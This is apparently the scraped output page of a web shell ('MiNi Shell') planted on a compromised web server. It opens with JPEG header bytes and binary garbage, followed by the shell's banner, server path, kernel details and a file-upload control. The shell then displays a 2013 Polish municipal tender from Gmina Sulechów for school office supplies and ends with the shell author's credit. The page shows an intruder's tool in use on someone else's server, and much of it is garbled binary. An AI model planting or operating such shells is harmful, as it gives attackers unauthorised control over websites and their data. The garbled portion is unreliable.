JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130305/88702-N-2013.html

<p class="kh_header"><b>Sulechów: Dostawa artykułów biurowych i papierniczych, które będą wykorzystywane podczas realizacji projektu Dasz Radę dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013</b><br>
<b>Numer ogłoszenia: 88702 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych i papierniczych, które będą wykorzystywane podczas realizacji projektu Dasz Radę dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wyposażenie, wraz z dostawą, siedmiu szkół podstawowych podległych Gminie Sulechów w artykuły biurowe i papiernicze, które będą wykorzystane podczas realizacji projektu Dasz radę w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego (Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych) 
2.	Zamawiający dokona zamówienia podzielonego na zestawy, które dostarczone będą do siedmiu szkół podstawowych podległych Gminie Sulechów, wymienionych poniżej:
2.1.	Szkoła Podstawowa nr 1 im. gen. Józefa Bema w Sulechowie ul. 31-go Stycznia 23 66-100 Sulechów,
2.2.	Szkoła Podstawowa nr 3 im. Janusza Kusocińskiego w Sulechowie ul. Piaskowa 52, 66-100 Sulechów,
2.3.	Szkoła Podstawowa w Brodach ul. Jagielnicka 97, Brody, 66-105 Pomorsko,
2.4.	Szkoła Podstawowa w Bukowie Buków 53, 66-100 Sulechów
2.5.	Szkoła Podstawowa w Cigacicach ul. Plac Szkolny 10, 66-131 Cigacice
2.6.	Szkoła Podstawowa w Kalsku Kalsk 65, 66-100 Sulechów 
2.7.	Szkoła Podstawowa w Kijach Kije 141 A, 66-100 Sulechów.
3.	Dostawa poniżej wymienionych pomocy dydaktycznych nastąpić ma w terminie 3 tygodni od dnia podpisania umowy. 
4.	Wykonawca po podpisaniu umowy otrzyma dodatkowy wykaz ile poszczególnych artykułów ma być dostarczone do każdej z ww. placówek wraz ze wskazaniem osoby upoważnionej do odbioru i potwierdzania zgodności zamówienia z dostarczonymi pomocami dydaktycznymi.
5.	Przedmiotem zamówienia są artykuły biurowe i papiernicze wymienione poniżej:
Lp	Nazwa artykułu	Ilość
1.	Bateria LR6/1,55V alkaiczna	16
2.	Bibuła 10 kol. mix kolorów	25
3.	Blok A3/10 kartek biały	48
4.	Blok rys A4/20 kartek biały 	82
5.	Blok rys mix kolorów A4	40
6.	Blok tech A3/10 kartek kolorowych	109
7.	Blok techniczny C4/A4	39
8.	Brulion A5/96k szyty twarda oprawa lak.	10
9.	Brystol A1 170g mix kolorów	92
10.	Brystol A1 kolor 200gr	26
11.	Cienkopis 0,4mm końcówka STABILO(rożne kolory)	36
12.	Clipboard A4 zamykany PCV	6
13.	Colli marker	22
14.	Długopis pstryk 567 niebieski	111
15.	Długopis SUPER GEL	9
16.	Długopis Tetis KD 920-Y 0,7 mm	86
17.	Długopis żelowy czarny niebieski/czarny	9
18.	Długopis żelowy Handy intese gel 0,5 mm (różne kolory)	30
19.	Długopis żelowy Pentel energel Liquid Gel 0,5	18
20.	Długopisy żelowe brokatowe /10 kol.	5
21.	Dratwa 25 dg	2
22.	Dziurkacz 837 L z listwą formatową do 25 kartek EAGLE	1
23.	Farby akrylowe 6 kol. 	13
24.	Farby plakat. 12 kol. 20 ml eco	37
25.	Folia do laminarki A4 80 (100szt)	2
26.	Grzbiet do bindowania 18 mm (100 szt.)	1
27.	Gumka do mazania Pentel (mała)	16
28.	Gumka do mazania STADLER (mała)	13
29.	Gumka Recepturka 25g 	1
30.	Karteczki samoprzylepne 50 kartek 75x75mm	13
31.	Klej biurowy roślinny	19
32.	Klej Magic tuba intr. Ok. 450	86
33.	Klej sztyft 21 g	55
34.	Klipy metalowy do papieru 25 mm/12 szt.	28
35.	Klipy metalowy do papieru 32 mm/12 szt.	22
36.	Klipy metalowy do papieru 41 mm/12 szt.	6
37.	Koszulka A4 ESSELTE/PATIO(100szt)	39
38.	Koszulka A5 ESSELTE/PATIO(100szt)	3
39.	Kredki 12 kol. FRIENSHIP	10
40.	Kredki ołówkowe 12 kolorów	29
41.	Kredki świecowe BAMBINO 12 kolorów	77
42.	Linijka 20 cm	8
43.	Linijka przezroczysta , różne kolory, odporna na odkształcenia dł.50cm. szer.4,0-5,0 cm	5
44.	Linijka przezroczysta szer.4,0-5,0cm, dł. 30cm	36
45.	Magnesy o średnicy 2cm	140
46.	Magnesy o średnicy 3cm	295
47.	Marker COLI HERLITZ czarny	35
48.	Marker do pisania kolorowy po 4 szt.	54
49.	Marker dwustronny cienki czarny	27
50.	Marker NOBO do tablic suchościeralnych	37
51.	Memo zakładka- bloczek kartek samoprzylepnych 4x20x50(40 kartek, 4 kolory)	6
52.	Modelina 6 kolorów	20
53.	Naklejki konie 16-16	10
54.	Naklejki psy 16-16	10
55.	Notes samoprzylepny 100 kartek 5,1x7,6	16
56.	Nożyczki 16,5 cm	28
57.	Nożyczki 20, 5 cm	21
58.	Nożyczki 31cm LACO	3
59.	Nożyczki biurowe Handy z nierdzewnej stali 21cm	11
60.	Ofertówka L A4 b. twarda	7
61.	Ołówek STAEDTLER Noris HB/2	38
62.	Pap. wizyt.246g/m2 (20szt.) 	5
63.	Papier biały do drukowania na drukarkach laserowych, gramatura 120g/m2, format A4 (250 szt.)	3
64.	Papier biały do drukowania na drukarkach laserowych, gramatura 160g/m2, format A4 (250 szt.)	3
65.	Papier do drukowania - kolorowy (niebieski, zielony, żółty) na drukarkach laserowych, gramatura 80g/m2 format A4 (500 szt.)	5
66.	Papier do drukowania -kolorowy (kolory pastelowe) na drukarkach laserowych, gramatura 160 g/m2 format A4 (250 szt.)	6
67.	Papier Ksero A4 biały	33
68.	Papier ksero kolor A4 , 160g/m2 (250 arkuszy)	16
69.	Papier ksero Pollux biały A4,80g/m2 (500 arkuszy)	8
70.	Papier makulat 108*126 (80 arkuszy)	6
71.	Pastele 36 olejne PHN Pentel	5
72.	Pastele olejne 12 kolorów pentel	19
73.	Pędzel art. Stoz.16	8
74.	Pędzle szkolne 6 szt. Płaskie rozm.1,2,3,4,5,6	9
75.	Pinezka Handy z kolorowa główką opak.(100 szt.)	11
76.	Pinezki beczułki(100szt)do tablic korkowych	3
77.	Pinezki tablicowe beczułki 100 szt.	2
78.	Pióro żelowe HU-1250	9
79.	Płyta CD	42
80.	Płyta DVD =RW 4,7 GB	2
81.	Pojemnik na dokumenty plast. (koszyk stojący), składany A4, wymiary 85x245x315- 6 kolorów	2
82.	Segregator  A4  4,5cm ESSELTE 	2
83.	Segregator  A4 4,5cm ESSELTE 	15
84.	Segregator  A5  4,5cm ESSELTE 	10
85.	Segregator A4 2,5cm 	12
86.	Segregator A4 4,5cm HANDY 	28
87.	Segregator A4 7,5cm ESSELTE 	2
88.	Segregator A4 7,5cm HANDY	16
89.	Segregator FCK/A4/7 061 Niebieski	9
90.	Skoroszyt  oczko plastik A4 niebieski 20 szt.	1
91.	Skoroszyt A4 PCV oczko z okładką przeźroczystą	56
92.	Skoroszyt oczko A4 pełny	18
93.	Skoroszyt oczko plastik A4 czerwony 20 szt.	1
94.	Szpilki 50gram	23
95.	Taśma dwustronna 19mmx1,5 m	3
96.	Taśma dwustronna 30mm*10m	3
97.	Taśma klejąca  szer. 20mm dł.12m	11
98.	Taśma klejąca  szer. 30mm, dł. 12 m	1
99.	Taśma ostrzegawcza biało-czerwona 100m	1
100.	Teczka do dok. podpis 25 kart z rozszerzanym grzbietem	1
101.	Teczka kolorowa lakierowana twarda 350g/m2, A4	9
102.	Teczka skrzydłowa z rzepem, tektura 2 mm szer. grzbietu 30 mm, A4	15
103.	Teczka wiązana biała A4, tektura,gramatura 350g/m2	10
104.	Teczka wiązana plastikowa A4	10
105.	Teczka z gumką kolor A4, tektura, gramatura 350g/m2	60
106.	Temperówka z pojemnikiem	6
107.	Temperówka HERTLITZ podwójna	10
108.	Torebka strunowa 12x18 (100 szt.)	1
109.	Torebka strunowa 7x10 (100 szt.)	1
110.	Wycinanka A4/8 kolorów	29
111.	Zakreślacz DELI żółty	18
112.	Zakreślacz OF1 Pomarańczowy	46
113.	Zakreślacz OF1 Różowy	44
114.	Zakreślacz OF1 Zielony	44
115.	Zakreślacz OF1 Żółty	34
116.	Zakreślacz TH 1127 (końcówka ścięta) mix kolorów 	69
117.	Zeszyt A5, 32 kartki, kratka, szyty.	66
118.	Zszywacz DELI 0368	8
119.	Zszywacz długoramienny Eagle 950L	2
120.	Zszywacz Eagle 9628 obrotowy	1
121.	Zszywki 24/6/1000/	15
122.	Zszywki Novus (1000 szt.) 24/6	10
6.	Rozliczenie należności nastąpi jednorazowo.
7.	Zamawiający nie dopuszcza składania ofert wariantowych ani częściowych.
8.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
9.	Wszędzie tam gdzie Zamawiający użył nazw własnych dopuszcza składanie ofert równoważnych.
10.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.21-5, 30.19.76.30-1, 30.19.76.44-2, 30.19.95.00-5, 30.23.43.00-1, 30.23.44.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty na załączniku nr 1.
2.	Dane Wykonawcy na załączniku nr 1a.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w ustawie PZP. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy.
5. Wykonawca, wraz z ofertą składa listę podmiotów, należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informację o tym, że nie należy do grupy kapitałowej - załącznik nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
1)	stawki podatku od towarów i usług w przypadku ustawowej zmiany stawek, a w konsekwencji zmiany (podwyższenia lub obniżenia) kwoty brutto wynikającej z umowy, 
2)	nazwy zadania, numerów kont bankowych oraz działów, rozdziałów i paragrafów klasyfikacji budżetowej,
3)	przedstawicieli stron,
4)	 terminu wypłaty wynagrodzenia określonego w § 4 ust. 1 umowy może ulec zmianie w sytuacji, gdy na konto Projektu nie zostanie przekazana przez instytucję pośredniczącą wystarczająca suma środków przeznaczonych na wypłatę wynagrodzenia. Opóźnienie wypłaty wynagrodzenia Zleceniobiorcy w okolicznościach opisanych powyżej nie stanowi podstawy do żądania przez Zleceniobiorcę dodatkowych świadczeń (odsetek itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów pokój nr 119b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2013 godzina 09:30, miejsce: Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów pokój nr 002 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ralizacjia projektu Dasz radę w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego (Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com